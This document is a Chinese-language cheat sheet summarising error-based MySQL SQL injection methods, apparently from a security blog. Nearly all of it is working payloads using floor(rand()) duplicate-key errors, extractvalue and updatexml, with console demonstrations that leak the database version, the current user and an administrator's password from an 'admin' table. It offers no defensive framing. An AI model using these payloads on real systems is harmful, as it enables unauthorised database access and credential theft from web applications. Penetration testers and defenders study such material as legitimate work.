mysql 注入报错利用方法总结


    1、通过floor报错
    可以通过如下一些利用代码
    and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
    and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));
    举例如下:
    首先进行正常查询:
    mysql> select * from article where id = 1;
    +—-+——-+———+
    | id | title | content |
    +—-+——-+———+
    | 1 | test | do it |
    +—-+——-+———+
    假如id输入存在注入的话,可以通过如下语句进行报错。
    mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
    ERROR 1062 (23000): Duplicate entry ‘5.1.33-community-log1’ for key ‘group_key’
    可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
    例如我们需要查询管理员用户名和密码:
    Method1:
    mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
    ERROR 1062 (23000): Duplicate entry ‘admin8881’ for key ‘group_key’
    Method2:
    mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
    ERROR 1062 (23000): Duplicate entry ‘admin8881’ for key ‘group_key’
    2、ExtractValue
    测试语句如下
    and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
    实际测试过程
    mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
    ERROR 1105 (HY000): XPATH syntax error: ‘\admin888’
    3、UpdateXml
    测试语句
    and 1=(updatexml(1,concat(0x3a,(select user())),1))
    实际测试过程
    mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ‘:root@localhost’